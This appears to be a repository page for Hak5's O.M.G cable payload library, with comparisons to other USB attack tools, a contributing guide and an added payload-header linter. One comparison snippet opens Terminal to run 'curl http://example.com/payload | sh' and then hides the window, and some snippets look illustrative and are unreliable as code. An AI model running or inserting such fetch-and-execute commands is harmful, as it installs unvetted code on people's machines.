hak5/omg-payloads

Official payload library for the O.MG line of products from Mischief Gadgets

Competitor Comparisons

USBdriveby exploits the trust of USB devices by emulating an HID keyboard and mouse, installing a cross-platform firewall-evading backdoor, and rerouting DNS within seconds of plugging it in.

Pros of usbdriveby

  • Focused on a specific attack vector (USB-based attacks)
  • Lightweight and easy to understand for beginners
  • Includes a detailed explanation of the attack process

Cons of usbdriveby

  • Limited payload options compared to omg-payloads
  • Less frequently updated and maintained
  • Lacks cross-platform compatibility

Code Comparison

usbdriveby:

import time
import subprocess

def run_command(command):
    subprocess.call(command, shell=True)

run_command("osascript -e 'tell application \"Terminal\" to do script \"curl http://example.com/payload | sh\"'")
time.sleep(1)
run_command("osascript -e 'tell application \"Terminal\" to close (every window whose name contains \"bash\")'")

omg-payloads:

import sys
import usb.core
import usb.util

dev = usb.core.find(idVendor=0x1d6b, idProduct=0x0002)
if dev is None:
    sys.exit("Device not found")

dev.set_configuration()

The usbdriveby code focuses on executing commands on macOS using AppleScript, while omg-payloads demonstrates USB device interaction using the PyUSB library. omg-payloads offers a broader range of payload options and is more versatile across different platforms and attack scenarios.

P4wnP1 A.L.O.A. by MaMe82 is a framework which turns a Raspberry Pi Zero W into a flexible, low-cost platform for pentesting, red teaming and physical engagements ... or into "A Little Offensive Appliance".

Pros of P4wnP1_aloa

  • More versatile and customizable, supporting a wider range of hardware platforms
  • Offers a web-based interface for easier configuration and management
  • Provides more advanced scripting capabilities with bash and Python support

Cons of P4wnP1_aloa

  • Steeper learning curve due to its more complex features and setup process
  • Less frequent updates and potentially less community support
  • May require additional hardware or setup compared to OMG-payloads

Code Comparison

P4wnP1_aloa (Python script example):

from pwnlib import *

def run():
    led.blink(500)
    keyboard.type("Hello from P4wnP1!")
    usb_gadget.set_mode("hid")

OMG-payloads (DuckyScript example):

DELAY 1000
LED 0 255 0
STRING Hello from OMG!
ENTER

Both repositories offer payload scripts for USB attack devices, but P4wnP1_aloa provides more advanced scripting options with full programming language support, while OMG-payloads focuses on simpler, more accessible DuckyScript payloads. P4wnP1_aloa is better suited for advanced users and complex scenarios, while OMG-payloads is more user-friendly for quick and straightforward attacks.

P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W.

Pros of P4wnP1

  • More versatile and customizable, supporting a wider range of attack scenarios
  • Built-in web interface for easier configuration and management
  • Supports multiple USB gadget modes, including RNDIS, ECM, and HID

Cons of P4wnP1

  • Steeper learning curve due to its more complex features
  • Less frequently updated compared to OMG-Payloads
  • Requires more hardware setup and configuration

Code Comparison

P4wnP1:

# Example of USB gadget setup
USB_GADGET = {
    "idVendor": "0x1d6b",
    "idProduct": "0x0104",
    "bcdDevice": "0x0100",
    "bcdUSB": "0x0200",
}

OMG-Payloads:

REM Example of a simple payload
DELAY 1000
GUI r
DELAY 200
STRING notepad
ENTER
DELAY 1000
STRING Hello from OMG!

The P4wnP1 code snippet demonstrates its advanced USB gadget configuration capabilities, while the OMG-Payloads example shows a simpler DuckyScript payload format. P4wnP1 offers more low-level control and customization, whereas OMG-Payloads focuses on ease of use and quick payload creation.

Wireless keystroke injection attack platform

Pros of WiFiDuck

  • Open-source and community-driven development
  • Supports both USB and Wi-Fi connectivity
  • Customizable firmware for advanced users

Cons of WiFiDuck

  • Limited pre-built payload library compared to OMG Payloads
  • May require more technical knowledge to set up and use effectively
  • Less frequent updates and maintenance

Code Comparison

WiFiDuck example payload:

layout("us");
typingSpeed(0);
delay(1000);
println("Hello World!");

OMG Payloads example payload:

DELAY 1000
LAYOUT US
STRINGLN Hello World!

Both repositories offer similar functionality for creating and executing payloads on USB rubber ducky-like devices. WiFiDuck provides a more flexible platform with Wi-Fi capabilities, while OMG Payloads offers a larger collection of ready-to-use payloads and benefits from Hak5's extensive ecosystem. The choice between the two depends on the user's specific needs, technical expertise, and desired features.

WiFi HID Injector - A USB Rubberducky / BadUSB On Steroids.

Pros of WHID

  • Open-source and community-driven, allowing for more customization and contributions
  • Supports a wider range of hardware platforms, including ESP8266 and ESP32
  • Offers more advanced features like wireless connectivity and remote payload execution

Cons of WHID

  • Less polished user interface and documentation compared to OMG-payloads
  • Smaller community and fewer pre-built payloads available
  • May require more technical knowledge to set up and use effectively

Code Comparison

WHID example payload:

#include <DigiKeyboard.h>

void setup() {
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.println("echo Hello, WHID!");
}

void loop() {}

OMG-payloads example payload:

import usb_hid
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS

keyboard = Keyboard(usb_hid.devices)
layout = KeyboardLayoutUS(keyboard)

layout.write("echo Hello, OMG!")

Both repositories focus on creating and executing payloads for USB rubber ducky-style attacks. WHID offers more flexibility and advanced features but may require more technical expertise. OMG-payloads provides a more user-friendly experience with a larger collection of pre-built payloads. The code examples demonstrate the different programming languages and approaches used by each project.

README

Payload Library for O.MG Devices

This repository contains payloads and extensions for O.MG Devices. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.

About the O.MG Cable

To get a cable like this, you used to need a million dollar budget or to find a guy named MG at DEFCON. But Hak5 teamed up with MG to allow more people access to this previously clandestine attack hardware.

Documentation

Documentation on developing payloads for the OMG Cable can be found on the OMG Wiki.

Disclaimer

Generally, payloads may execute commands on your device or target. As such, it is possible for a payload to damage your device or target. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.

Legal

Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.

Contributing

Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and approved pull requests will add your payload to this repository, where it may be publicly available.

Please adhere to the following best practices and style guide when submitting a payload.

Naming Conventions

Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be submitted into its own directory, with - or _ used in place of spaces, under one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.

Comments

Payloads should begin with comments specifying at the very least the name of the payload and author. Additional information such as a brief description, the target, any dependencies / prerequisites and the LED status used is helpful.

REM Title: FTP Exfiltrator
REM Description: Exfiltrates files from %userprofile%\documents via FTP
REM Author: Hak5Darren
REM Target: Windows XP SP3 - Latest
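
A reviewer-side check for the naming and comment conventions above, as an added example that is not code from the repository or from Hak5. The category set holds only the four names the page mentions, and the `category/payload_dir/file` path layout and the file name `payload.txt` are assumptions made for illustration.

```python
import re
from pathlib import PurePosixPath

# Categories named on the page ("such as ..."); the real repository may have more.
KNOWN_CATEGORIES = {"exfiltration", "phishing", "remote_access", "recon"}
REQUIRED_FIELDS = ("title", "author")  # the stated minimum: payload name and author
HEADER_RE = re.compile(r"^REM\s+([A-Za-z ]+?)\s*:\s*(.*)$")


def parse_header(payload_text):
    """Return {field: value} from the leading block of REM comment lines."""
    fields = {}
    for line in payload_text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.split()[0] != "REM":
            break  # the first non-comment line ends the header
        m = HEADER_RE.match(line)
        if m:
            fields[m.group(1).lower()] = m.group(2).strip()
    return fields


def lint_payload(rel_path, payload_text):
    """Check one submission; rel_path is assumed to be category/payload_dir/file."""
    problems = []
    parts = PurePosixPath(rel_path).parts
    if len(parts) < 3:
        problems.append("payload must sit in its own directory under a category")
    else:
        category, payload_dir = parts[0], parts[1]
        if category not in KNOWN_CATEGORIES:
            problems.append(f"unknown category: {category}")
        if " " in payload_dir:
            problems.append("payload name contains spaces; use - or _")
    header = parse_header(payload_text)
    for field in REQUIRED_FIELDS:
        if not header.get(field):
            problems.append(f"missing REM {field.capitalize()}: header")
    return problems


# Constructed sample inputs; GOOD reuses the header lines shown on the page.
GOOD = "REM Title: FTP Exfiltrator\nREM Author: Hak5Darren\nDELAY 1000\n"
BAD = "DELAY 1000\nREM Title: late header\n"

if __name__ == "__main__":
    print(lint_payload("exfiltration/ftp_exfiltrator/payload.txt", GOOD))
    print(lint_payload("my stuff/ftp exfil/payload.txt", BAD))
```

A REM line that appears after the first command is not counted as header, so a payload that buries its title and author below executable lines is reported as missing both.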